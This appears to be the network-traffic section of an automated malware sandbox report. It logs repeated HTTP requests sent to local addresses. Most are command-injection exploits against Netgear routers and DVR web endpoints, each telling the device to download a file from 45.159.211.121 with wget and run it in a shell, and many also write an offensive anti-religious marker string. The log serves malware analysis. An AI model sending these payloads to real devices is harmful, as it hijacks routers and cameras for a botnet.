Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.53Connection: close
